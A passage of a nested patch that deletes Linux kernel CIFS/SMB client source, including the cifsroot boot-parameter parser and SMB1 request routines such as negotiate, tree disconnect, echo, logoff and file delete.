+-void extract_unc_hostname(const char *unc, const char **h, size_t *len);
+-int copy_path_name(char *dst, const char *src);
+-int smb2_parse_query_directory(struct cifs_tcon *tcon, struct kvec *rsp_iov,
+-			       int resp_buftype,
+-			       struct cifs_search_info *srch_inf);
+-
+-struct super_block *cifs_get_tcp_super(struct TCP_Server_Info *server);
+-void cifs_put_tcp_super(struct super_block *sb);
+-int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix);
+-char *extract_hostname(const char *unc);
+-char *extract_sharename(const char *unc);
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-static inline int get_dfs_path(const unsigned int xid, struct cifs_ses *ses,
+-			       const char *old_path,
+-			       const struct nls_table *nls_codepage,
+-			       struct dfs_info3_param *referral, int remap)
+-{
+-	return dfs_cache_find(xid, ses, nls_codepage, remap, old_path,
+-			      referral, NULL);
+-}
+-
+-int match_target_ip(struct TCP_Server_Info *server,
+-		    const char *share, size_t share_len,
+-		    bool *result);
+-int cifs_inval_name_dfs_link_error(const unsigned int xid,
+-				   struct cifs_tcon *tcon,
+-				   struct cifs_sb_info *cifs_sb,
+-				   const char *full_path,
+-				   bool *islink);
+-#else
+-static inline int cifs_inval_name_dfs_link_error(const unsigned int xid,
+-				   struct cifs_tcon *tcon,
+-				   struct cifs_sb_info *cifs_sb,
+-				   const char *full_path,
+-				   bool *islink)
+-{
+-	*islink = false;
+-	return 0;
+-}
+-#endif
+-
+-static inline int cifs_create_options(struct cifs_sb_info *cifs_sb, int options)
+-{
+-	if (cifs_sb && (backup_cred(cifs_sb)))
+-		return options | CREATE_OPEN_BACKUP_INTENT;
+-	else
+-		return options;
+-}
+-
+-struct super_block *cifs_get_tcon_super(struct cifs_tcon *tcon);
+-void cifs_put_tcon_super(struct super_block *sb);
+-int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry);
+-
+-#endif			/* _CIFSPROTO_H */
+diff --git a/fs/cifs/cifsroot.c b/fs/cifs/cifsroot.c
+deleted file mode 100644
+index 56ec1b233f52e..0000000000000
+--- a/fs/cifs/cifsroot.c
++++ /dev/null
+@@ -1,94 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * SMB root file system support
+- *
+- * Copyright (c) 2019 Paulo Alcantara <palcantara@suse.de>
+- */
+-#include <linux/init.h>
+-#include <linux/fs.h>
+-#include <linux/types.h>
+-#include <linux/ctype.h>
+-#include <linux/string.h>
+-#include <linux/root_dev.h>
+-#include <linux/kernel.h>
+-#include <linux/in.h>
+-#include <linux/inet.h>
+-#include <net/ipconfig.h>
+-
+-#define DEFAULT_MNT_OPTS \
+-	"vers=1.0,cifsacl,mfsymlinks,rsize=1048576,wsize=65536,uid=0,gid=0," \
+-	"hard,rootfs"
+-
+-static char root_dev[2048] __initdata = "";
+-static char root_opts[1024] __initdata = DEFAULT_MNT_OPTS;
+-
+-static __be32 __init parse_srvaddr(char *start, char *end)
+-{
+-	/* TODO: ipv6 support */
+-	char addr[sizeof("aaa.bbb.ccc.ddd")];
+-	int i = 0;
+-
+-	while (start < end && i < sizeof(addr) - 1) {
+-		if (isdigit(*start) || *start == '.')
+-			addr[i++] = *start;
+-		start++;
+-	}
+-	addr[i] = '\0';
+-	return in_aton(addr);
+-}
+-
+-/* cifsroot=//<server-ip>/<share>[,options] */
+-static int __init cifs_root_setup(char *line)
+-{
+-	char *s;
+-	int len;
+-	__be32 srvaddr = htonl(INADDR_NONE);
+-
+-	ROOT_DEV = Root_CIFS;
+-
+-	if (strlen(line) > 3 && line[0] == '/' && line[1] == '/') {
+-		s = strchr(&line[2], '/');
+-		if (!s || s[1] == '\0')
+-			return 1;
+-
+-		/* make s point to ',' or '\0' at end of line */
+-		s = strchrnul(s, ',');
+-		/* len is strlen(unc) + '\0' */
+-		len = s - line + 1;
+-		if (len > sizeof(root_dev)) {
+-			pr_err("Root-CIFS: UNC path too long\n");
+-			return 1;
+-		}
+-		strscpy(root_dev, line, len);
+-		srvaddr = parse_srvaddr(&line[2], s);
+-		if (*s) {
+-			int n = snprintf(root_opts,
+-					 sizeof(root_opts), "%s,%s",
+-					 DEFAULT_MNT_OPTS, s + 1);
+-			if (n >= sizeof(root_opts)) {
+-				pr_err("Root-CIFS: mount options string too long\n");
+-				root_opts[sizeof(root_opts)-1] = '\0';
+-				return 1;
+-			}
+-		}
+-	}
+-
+-	root_server_addr = srvaddr;
+-
+-	return 1;
+-}
+-
+-__setup("cifsroot=", cifs_root_setup);
+-
+-int __init cifs_root_data(char **dev, char **opts)
+-{
+-	if (!root_dev[0] || root_server_addr == htonl(INADDR_NONE)) {
+-		pr_err("Root-CIFS: no SMB server address\n");
+-		return -1;
+-	}
+-
+-	*dev = root_dev;
+-	*opts = root_opts;
+-
+-	return 0;
+-}
+diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c
+deleted file mode 100644
+index c90d4ec9292ca..0000000000000
+--- a/fs/cifs/cifssmb.c
++++ /dev/null
+@@ -1,5873 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2010
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- *   Contains the routines for constructing the SMB PDUs themselves
+- *
+- */
+-
+- /* SMB/CIFS PDU handling routines here - except for leftovers in connect.c   */
+- /* These are mostly routines that operate on a pathname, or on a tree id     */
+- /* (mounted volume), but there are eight handle based routines which must be */
+- /* treated slightly differently for reconnection purposes since we never     */
+- /* want to reuse a stale file handle and only the caller knows the file info */
+-
+-#include <linux/fs.h>
+-#include <linux/kernel.h>
+-#include <linux/vfs.h>
+-#include <linux/slab.h>
+-#include <linux/posix_acl_xattr.h>
+-#include <linux/pagemap.h>
+-#include <linux/swap.h>
+-#include <linux/task_io_accounting_ops.h>
+-#include <linux/uaccess.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsacl.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "fscache.h"
+-#include "smbdirect.h"
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-#include "dfs_cache.h"
+-#endif
+-
+-#ifdef CONFIG_CIFS_POSIX
+-static struct {
+-	int index;
+-	char *name;
+-} protocols[] = {
+-	{CIFS_PROT, "\2NT LM 0.12"},
+-	{POSIX_PROT, "\2POSIX 2"},
+-	{BAD_PROT, "\2"}
+-};
+-#else
+-static struct {
+-	int index;
+-	char *name;
+-} protocols[] = {
+-	{CIFS_PROT, "\2NT LM 0.12"},
+-	{BAD_PROT, "\2"}
+-};
+-#endif
+-
+-/* define the number of elements in the cifs dialect array */
+-#ifdef CONFIG_CIFS_POSIX
+-#define CIFS_NUM_PROT 2
+-#else /* not posix */
+-#define CIFS_NUM_PROT 1
+-#endif /* CIFS_POSIX */
+-
+-
+-/* reconnect the socket, tcon, and smb session if needed */
+-static int
+-cifs_reconnect_tcon(struct cifs_tcon *tcon, int smb_command)
+-{
+-	int rc;
+-	struct cifs_ses *ses;
+-	struct TCP_Server_Info *server;
+-	struct nls_table *nls_codepage;
+-
+-	/*
+-	 * SMBs NegProt, SessSetup, uLogoff do not have tcon yet so check for
+-	 * tcp and smb session status done differently for those three - in the
+-	 * calling routine
+-	 */
+-	if (!tcon)
+-		return 0;
+-
+-	ses = tcon->ses;
+-	server = ses->server;
+-
+-	/*
+-	 * only tree disconnect, open, and write, (and ulogoff which does not
+-	 * have tcon) are allowed as we start umount
+-	 */
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->status == TID_EXITING) {
+-		if (smb_command != SMB_COM_TREE_DISCONNECT) {
+-			spin_unlock(&tcon->tc_lock);
+-			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
+-				 smb_command);
+-			return -ENODEV;
+-		}
+-	}
+-	spin_unlock(&tcon->tc_lock);
+-
+-	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
+-	if (rc)
+-		return rc;
+-
+-	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
+-		spin_unlock(&ses->chan_lock);
+-		return 0;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	nls_codepage = load_nls_default();
+-
+-	/*
+-	 * Recheck after acquire mutex. If another thread is negotiating
+-	 * and the server never sends an answer the socket will be closed
+-	 * and tcpStatus set to reconnect.
+-	 */
+-	spin_lock(&server->srv_lock);
+-	if (server->tcpStatus == CifsNeedReconnect) {
+-		spin_unlock(&server->srv_lock);
+-		rc = -EHOSTDOWN;
+-		goto out;
+-	}
+-	spin_unlock(&server->srv_lock);
+-
+-	/*
+-	 * need to prevent multiple threads trying to simultaneously
+-	 * reconnect the same SMB session
+-	 */
+-	spin_lock(&ses->chan_lock);
+-	if (!cifs_chan_needs_reconnect(ses, server)) {
+-		spin_unlock(&ses->chan_lock);
+-
+-		/* this means that we only need to tree connect */
+-		if (tcon->need_reconnect)
+-			goto skip_sess_setup;
+-
+-		rc = -EHOSTDOWN;
+-		goto out;
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	mutex_lock(&ses->session_mutex);
+-	rc = cifs_negotiate_protocol(0, ses, server);
+-	if (!rc)
+-		rc = cifs_setup_session(0, ses, server, nls_codepage);
+-
+-	/* do we need to reconnect tcon? */
+-	if (rc || !tcon->need_reconnect) {
+-		mutex_unlock(&ses->session_mutex);
+-		goto out;
+-	}
+-
+-skip_sess_setup:
+-	cifs_mark_open_files_invalid(tcon);
+-	rc = cifs_tree_connect(0, tcon, nls_codepage);
+-	mutex_unlock(&ses->session_mutex);
+-	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
+-
+-	if (rc) {
+-		pr_warn_once("reconnect tcon failed rc = %d\n", rc);
+-		goto out;
+-	}
+-
+-	atomic_inc(&tconInfoReconnectCount);
+-
+-	/* tell server Unix caps we support */
+-	if (cap_unix(ses))
+-		reset_cifs_unix_caps(0, tcon, NULL, NULL);
+-
+-	/*
+-	 * Removed call to reopen open files here. It is safer (and faster) to
+-	 * reopen files one at a time as needed in read and write.
+-	 *
+-	 * FIXME: what about file locks? don't we need to reclaim them ASAP?
+-	 */
+-
+-out:
+-	/*
+-	 * Check if handle based operation so we know whether we can continue
+-	 * or not without returning to caller to reset file handle
+-	 */
+-	switch (smb_command) {
+-	case SMB_COM_READ_ANDX:
+-	case SMB_COM_WRITE_ANDX:
+-	case SMB_COM_CLOSE:
+-	case SMB_COM_FIND_CLOSE2:
+-	case SMB_COM_LOCKING_ANDX:
+-		rc = -EAGAIN;
+-	}
+-
+-	unload_nls(nls_codepage);
+-	return rc;
+-}
+-
+-/* Allocate and return pointer to an SMB request buffer, and set basic
+-   SMB information in the SMB header.  If the return code is zero, this
+-   function must have filled in request_buf pointer */
+-static int
+-small_smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
+-		void **request_buf)
+-{
+-	int rc;
+-
+-	rc = cifs_reconnect_tcon(tcon, smb_command);
+-	if (rc)
+-		return rc;
+-
+-	*request_buf = cifs_small_buf_get();
+-	if (*request_buf == NULL) {
+-		/* BB should we add a retry in here if not a writepage? */
+-		return -ENOMEM;
+-	}
+-
+-	header_assemble((struct smb_hdr *) *request_buf, smb_command,
+-			tcon, wct);
+-
+-	if (tcon != NULL)
+-		cifs_stats_inc(&tcon->num_smbs_sent);
+-
+-	return 0;
+-}
+-
+-int
+-small_smb_init_no_tc(const int smb_command, const int wct,
+-		     struct cifs_ses *ses, void **request_buf)
+-{
+-	int rc;
+-	struct smb_hdr *buffer;
+-
+-	rc = small_smb_init(smb_command, wct, NULL, request_buf);
+-	if (rc)
+-		return rc;
+-
+-	buffer = (struct smb_hdr *)*request_buf;
+-	buffer->Mid = get_next_mid(ses->server);
+-	if (ses->capabilities & CAP_UNICODE)
+-		buffer->Flags2 |= SMBFLG2_UNICODE;
+-	if (ses->capabilities & CAP_STATUS32)
+-		buffer->Flags2 |= SMBFLG2_ERR_STATUS;
+-
+-	/* uid, tid can stay at zero as set in header assemble */
+-
+-	/* BB add support for turning on the signing when
+-	this function is used after 1st of session setup requests */
+-
+-	return rc;
+-}
+-
+-/* If the return code is zero, this function must fill in request_buf pointer */
+-static int
+-__smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
+-			void **request_buf, void **response_buf)
+-{
+-	*request_buf = cifs_buf_get();
+-	if (*request_buf == NULL) {
+-		/* BB should we add a retry in here if not a writepage? */
+-		return -ENOMEM;
+-	}
+-    /* Although the original thought was we needed the response buf for  */
+-    /* potential retries of smb operations it turns out we can determine */
+-    /* from the mid flags when the request buffer can be resent without  */
+-    /* having to use a second distinct buffer for the response */
+-	if (response_buf)
+-		*response_buf = *request_buf;
+-
+-	header_assemble((struct smb_hdr *) *request_buf, smb_command, tcon,
+-			wct);
+-
+-	if (tcon != NULL)
+-		cifs_stats_inc(&tcon->num_smbs_sent);
+-
+-	return 0;
+-}
+-
+-/* If the return code is zero, this function must fill in request_buf pointer */
+-static int
+-smb_init(int smb_command, int wct, struct cifs_tcon *tcon,
+-	 void **request_buf, void **response_buf)
+-{
+-	int rc;
+-
+-	rc = cifs_reconnect_tcon(tcon, smb_command);
+-	if (rc)
+-		return rc;
+-
+-	return __smb_init(smb_command, wct, tcon, request_buf, response_buf);
+-}
+-
+-static int
+-smb_init_no_reconnect(int smb_command, int wct, struct cifs_tcon *tcon,
+-			void **request_buf, void **response_buf)
+-{
+-	spin_lock(&tcon->ses->chan_lock);
+-	if (cifs_chan_needs_reconnect(tcon->ses, tcon->ses->server) ||
+-	    tcon->need_reconnect) {
+-		spin_unlock(&tcon->ses->chan_lock);
+-		return -EHOSTDOWN;
+-	}
+-	spin_unlock(&tcon->ses->chan_lock);
+-
+-	return __smb_init(smb_command, wct, tcon, request_buf, response_buf);
+-}
+-
+-static int validate_t2(struct smb_t2_rsp *pSMB)
+-{
+-	unsigned int total_size;
+-
+-	/* check for plausible wct */
+-	if (pSMB->hdr.WordCount < 10)
+-		goto vt2_err;
+-
+-	/* check for parm and data offset going beyond end of smb */
+-	if (get_unaligned_le16(&pSMB->t2_rsp.ParameterOffset) > 1024 ||
+-	    get_unaligned_le16(&pSMB->t2_rsp.DataOffset) > 1024)
+-		goto vt2_err;
+-
+-	total_size = get_unaligned_le16(&pSMB->t2_rsp.ParameterCount);
+-	if (total_size >= 512)
+-		goto vt2_err;
+-
+-	/* check that bcc is at least as big as parms + data, and that it is
+-	 * less than negotiated smb buffer
+-	 */
+-	total_size += get_unaligned_le16(&pSMB->t2_rsp.DataCount);
+-	if (total_size > get_bcc(&pSMB->hdr) ||
+-	    total_size >= CIFSMaxBufSize + MAX_CIFS_HDR_SIZE)
+-		goto vt2_err;
+-
+-	return 0;
+-vt2_err:
+-	cifs_dump_mem("Invalid transact2 SMB: ", (char *)pSMB,
+-		sizeof(struct smb_t2_rsp) + 16);
+-	return -EINVAL;
+-}
+-
+-static int
+-decode_ext_sec_blob(struct cifs_ses *ses, NEGOTIATE_RSP *pSMBr)
+-{
+-	int	rc = 0;
+-	u16	count;
+-	char	*guid = pSMBr->u.extended_response.GUID;
+-	struct TCP_Server_Info *server = ses->server;
+-
+-	count = get_bcc(&pSMBr->hdr);
+-	if (count < SMB1_CLIENT_GUID_SIZE)
+-		return -EIO;
+-
+-	spin_lock(&cifs_tcp_ses_lock);
+-	if (server->srv_count > 1) {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		if (memcmp(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE) != 0) {
+-			cifs_dbg(FYI, "server UID changed\n");
+-			memcpy(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE);
+-		}
+-	} else {
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		memcpy(server->server_GUID, guid, SMB1_CLIENT_GUID_SIZE);
+-	}
+-
+-	if (count == SMB1_CLIENT_GUID_SIZE) {
+-		server->sec_ntlmssp = true;
+-	} else {
+-		count -= SMB1_CLIENT_GUID_SIZE;
+-		rc = decode_negTokenInit(
+-			pSMBr->u.extended_response.SecurityBlob, count, server);
+-		if (rc != 1)
+-			return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static bool
+-should_set_ext_sec_flag(enum securityEnum sectype)
+-{
+-	switch (sectype) {
+-	case RawNTLMSSP:
+-	case Kerberos:
+-		return true;
+-	case Unspecified:
+-		if (global_secflags &
+-		    (CIFSSEC_MAY_KRB5 | CIFSSEC_MAY_NTLMSSP))
+-			return true;
+-		fallthrough;
+-	default:
+-		return false;
+-	}
+-}
+-
+-int
+-CIFSSMBNegotiate(const unsigned int xid,
+-		 struct cifs_ses *ses,
+-		 struct TCP_Server_Info *server)
+-{
+-	NEGOTIATE_REQ *pSMB;
+-	NEGOTIATE_RSP *pSMBr;
+-	int rc = 0;
+-	int bytes_returned;
+-	int i;
+-	u16 count;
+-
+-	if (!server) {
+-		WARN(1, "%s: server is NULL!\n", __func__);
+-		return -EIO;
+-	}
+-
+-	rc = smb_init(SMB_COM_NEGOTIATE, 0, NULL /* no tcon yet */ ,
+-		      (void **) &pSMB, (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Mid = get_next_mid(server);
+-	pSMB->hdr.Flags2 |= (SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS);
+-
+-	if (should_set_ext_sec_flag(ses->sectype)) {
+-		cifs_dbg(FYI, "Requesting extended security\n");
+-		pSMB->hdr.Flags2 |= SMBFLG2_EXT_SEC;
+-	}
+-
+-	count = 0;
+-	/*
+-	 * We know that all the name entries in the protocols array
+-	 * are short (< 16 bytes anyway) and are NUL terminated.
+-	 */
+-	for (i = 0; i < CIFS_NUM_PROT; i++) {
+-		size_t len = strlen(protocols[i].name) + 1;
+-
+-		memcpy(&pSMB->DialectsArray[count], protocols[i].name, len);
+-		count += len;
+-	}
+-	inc_rfc1001_len(pSMB, count);
+-	pSMB->ByteCount = cpu_to_le16(count);
+-
+-	rc = SendReceive(xid, ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc != 0)
+-		goto neg_err_exit;
+-
+-	server->dialect = le16_to_cpu(pSMBr->DialectIndex);
+-	cifs_dbg(FYI, "Dialect: %d\n", server->dialect);
+-	/* Check wct = 1 error case */
+-	if ((pSMBr->hdr.WordCount <= 13) || (server->dialect == BAD_PROT)) {
+-		/* core returns wct = 1, but we do not ask for core - otherwise
+-		small wct just comes when dialect index is -1 indicating we
+-		could not negotiate a common dialect */
+-		rc = -EOPNOTSUPP;
+-		goto neg_err_exit;
+-	} else if (pSMBr->hdr.WordCount != 17) {
+-		/* unknown wct */
+-		rc = -EOPNOTSUPP;
+-		goto neg_err_exit;
+-	}
+-	/* else wct == 17, NTLM or better */
+-
+-	server->sec_mode = pSMBr->SecurityMode;
+-	if ((server->sec_mode & SECMODE_USER) == 0)
+-		cifs_dbg(FYI, "share mode security\n");
+-
+-	/* one byte, so no need to convert this or EncryptionKeyLen from
+-	   little endian */
+-	server->maxReq = min_t(unsigned int, le16_to_cpu(pSMBr->MaxMpxCount),
+-			       cifs_max_pending);
+-	set_credits(server, server->maxReq);
+-	/* probably no need to store and check maxvcs */
+-	server->maxBuf = le32_to_cpu(pSMBr->MaxBufferSize);
+-	/* set up max_read for readahead check */
+-	server->max_read = server->maxBuf;
+-	server->max_rw = le32_to_cpu(pSMBr->MaxRawSize);
+-	cifs_dbg(NOISY, "Max buf = %d\n", ses->server->maxBuf);
+-	server->capabilities = le32_to_cpu(pSMBr->Capabilities);
+-	server->timeAdj = (int)(__s16)le16_to_cpu(pSMBr->ServerTimeZone);
+-	server->timeAdj *= 60;
+-
+-	if (pSMBr->EncryptionKeyLength == CIFS_CRYPTO_KEY_SIZE) {
+-		server->negflavor = CIFS_NEGFLAVOR_UNENCAP;
+-		memcpy(ses->server->cryptkey, pSMBr->u.EncryptionKey,
+-		       CIFS_CRYPTO_KEY_SIZE);
+-	} else if (pSMBr->hdr.Flags2 & SMBFLG2_EXT_SEC ||
+-			server->capabilities & CAP_EXTENDED_SECURITY) {
+-		server->negflavor = CIFS_NEGFLAVOR_EXTENDED;
+-		rc = decode_ext_sec_blob(ses, pSMBr);
+-	} else if (server->sec_mode & SECMODE_PW_ENCRYPT) {
+-		rc = -EIO; /* no crypt key only if plain text pwd */
+-	} else {
+-		server->negflavor = CIFS_NEGFLAVOR_UNENCAP;
+-		server->capabilities &= ~CAP_EXTENDED_SECURITY;
+-	}
+-
+-	if (!rc)
+-		rc = cifs_enable_signing(server, ses->sign);
+-neg_err_exit:
+-	cifs_buf_release(pSMB);
+-
+-	cifs_dbg(FYI, "negprot rc %d\n", rc);
+-	return rc;
+-}
+-
+-int
+-CIFSSMBTDis(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-	struct smb_hdr *smb_buffer;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "In tree disconnect\n");
+-
+-	/* BB: do we need to check this? These should never be NULL. */
+-	if ((tcon->ses == NULL) || (tcon->ses->server == NULL))
+-		return -EIO;
+-
+-	/*
+-	 * No need to return error on this operation if tid invalidated and
+-	 * closed on server already e.g. due to tcp session crashing. Also,
+-	 * the tcon is no longer on the list, so no need to take lock before
+-	 * checking this.
+-	 */
+-	spin_lock(&tcon->ses->chan_lock);
+-	if ((tcon->need_reconnect) || CIFS_ALL_CHANS_NEED_RECONNECT(tcon->ses)) {
+-		spin_unlock(&tcon->ses->chan_lock);
+-		return -EIO;
+-	}
+-	spin_unlock(&tcon->ses->chan_lock);
+-
+-	rc = small_smb_init(SMB_COM_TREE_DISCONNECT, 0, tcon,
+-			    (void **)&smb_buffer);
+-	if (rc)
+-		return rc;
+-
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *)smb_buffer, 0);
+-	cifs_small_buf_release(smb_buffer);
+-	if (rc)
+-		cifs_dbg(FYI, "Tree disconnect failed %d\n", rc);
+-
+-	/* No need to return error on this operation if tid invalidated and
+-	   closed on server already e.g. due to tcp session crashing */
+-	if (rc == -EAGAIN)
+-		rc = 0;
+-
+-	return rc;
+-}
+-
+-/*
+- * This is a no-op for now. We're not really interested in the reply, but
+- * rather in the fact that the server sent one and that server->lstrp
+- * gets updated.
+- *
+- * FIXME: maybe we should consider checking that the reply matches request?
+- */
+-static void
+-cifs_echo_callback(struct mid_q_entry *mid)
+-{
+-	struct TCP_Server_Info *server = mid->callback_data;
+-	struct cifs_credits credits = { .value = 1, .instance = 0 };
+-
+-	release_mid(mid);
+-	add_credits(server, &credits, CIFS_ECHO_OP);
+-}
+-
+-int
+-CIFSSMBEcho(struct TCP_Server_Info *server)
+-{
+-	ECHO_REQ *smb;
+-	int rc = 0;
+-	struct kvec iov[2];
+-	struct smb_rqst rqst = { .rq_iov = iov,
+-				 .rq_nvec = 2 };
+-
+-	cifs_dbg(FYI, "In echo request\n");
+-
+-	rc = small_smb_init(SMB_COM_ECHO, 0, NULL, (void **)&smb);
+-	if (rc)
+-		return rc;
+-
+-	if (server->capabilities & CAP_UNICODE)
+-		smb->hdr.Flags2 |= SMBFLG2_UNICODE;
+-
+-	/* set up echo request */
+-	smb->hdr.Tid = 0xffff;
+-	smb->hdr.WordCount = 1;
+-	put_unaligned_le16(1, &smb->EchoCount);
+-	put_bcc(1, &smb->hdr);
+-	smb->Data[0] = 'a';
+-	inc_rfc1001_len(smb, 3);
+-
+-	iov[0].iov_len = 4;
+-	iov[0].iov_base = smb;
+-	iov[1].iov_len = get_rfc1002_length(smb);
+-	iov[1].iov_base = (char *)smb + 4;
+-
+-	rc = cifs_call_async(server, &rqst, NULL, cifs_echo_callback, NULL,
+-			     server, CIFS_NON_BLOCKING | CIFS_ECHO_OP, NULL);
+-	if (rc)
+-		cifs_dbg(FYI, "Echo request failed: %d\n", rc);
+-
+-	cifs_small_buf_release(smb);
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBLogoff(const unsigned int xid, struct cifs_ses *ses)
+-{
+-	LOGOFF_ANDX_REQ *pSMB;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "In SMBLogoff for session disconnect\n");
+-
+-	/*
+-	 * BB: do we need to check validity of ses and server? They should
+-	 * always be valid since we have an active reference. If not, that
+-	 * should probably be a BUG()
+-	 */
+-	if (!ses || !ses->server)
+-		return -EIO;
+-
+-	mutex_lock(&ses->session_mutex);
+-	spin_lock(&ses->chan_lock);
+-	if (CIFS_ALL_CHANS_NEED_RECONNECT(ses)) {
+-		spin_unlock(&ses->chan_lock);
+-		goto session_already_dead; /* no need to send SMBlogoff if uid
+-					      already closed due to reconnect */
+-	}
+-	spin_unlock(&ses->chan_lock);
+-
+-	rc = small_smb_init(SMB_COM_LOGOFF_ANDX, 2, NULL, (void **)&pSMB);
+-	if (rc) {
+-		mutex_unlock(&ses->session_mutex);
+-		return rc;
+-	}
+-
+-	pSMB->hdr.Mid = get_next_mid(ses->server);
+-
+-	if (ses->server->sign)
+-		pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
+-
+-	pSMB->hdr.Uid = ses->Suid;
+-
+-	pSMB->AndXCommand = 0xFF;
+-	rc = SendReceiveNoRsp(xid, ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-session_already_dead:
+-	mutex_unlock(&ses->session_mutex);
+-
+-	/* if session dead then we do not need to do ulogoff,
+-		since server closed smb session, no sense reporting
+-		error */
+-	if (rc == -EAGAIN)
+-		rc = 0;
+-	return rc;
+-}
+-
+-int
+-CIFSPOSIXDelFile(const unsigned int xid, struct cifs_tcon *tcon,
+-		 const char *fileName, __u16 type,
+-		 const struct nls_table *nls_codepage, int remap)
+-{
+-	TRANSACTION2_SPI_REQ *pSMB = NULL;
+-	TRANSACTION2_SPI_RSP *pSMBr = NULL;
+-	struct unlink_psx_rq *pRqD;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count;
+-
+-	cifs_dbg(FYI, "In POSIX delete\n");
+-PsxDelete:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
+-				       PATH_MAX, nls_codepage, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, fileName);
+-	}
+-
+-	params = 6 + name_len;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = 0; /* BB double check this with jra */
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-
+-	/* Setup pointer to Request Data (inode type).
+-	 * Note that SMB offsets are from the beginning of SMB which is 4 bytes
+-	 * in, after RFC1001 field
+-	 */
+-	pRqD = (struct unlink_psx_rq *)((char *)(pSMB) + offset + 4);
+-	pRqD->type = cpu_to_le16(type);
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + sizeof(struct unlink_psx_rq);
+-
+-	pSMB->DataCount = cpu_to_le16(sizeof(struct unlink_psx_rq));
+-	pSMB->TotalDataCount = cpu_to_le16(sizeof(struct unlink_psx_rq));
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_POSIX_UNLINK);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "Posix delete returned %d\n", rc);
+-	cifs_buf_release(pSMB);
+-
+-	cifs_stats_inc(&tcon->stats.cifs_stats.num_deletes);
+-
+-	if (rc == -EAGAIN)
+-		goto PsxDelete;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBDelFile(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
+-	       struct cifs_sb_info *cifs_sb)
+-{
+-	DELETE_FILE_REQ *pSMB = NULL;
+-	DELETE_FILE_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned;
+-	int name_len;
+-	int remap = cifs_remap(cifs_sb);
+-
+-DelFileRetry:
+-	rc = smb_init(SMB_COM_DELETE, 1, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len = cifsConvertToUTF16((__le16 *) pSMB->fileName, name,
+-					      PATH_MAX, cifs_sb->local_nls,
+-					      remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->fileName, name);
+-	}
+-	pSMB->SearchAttributes =
+-	    cpu_to_le16(ATTR_READONLY | ATTR_HIDDEN | ATTR_SYSTEM);
+-	pSMB->BufferFormat = 0x04;
+-	inc_rfc1001_len(pSMB, name_len + 1);
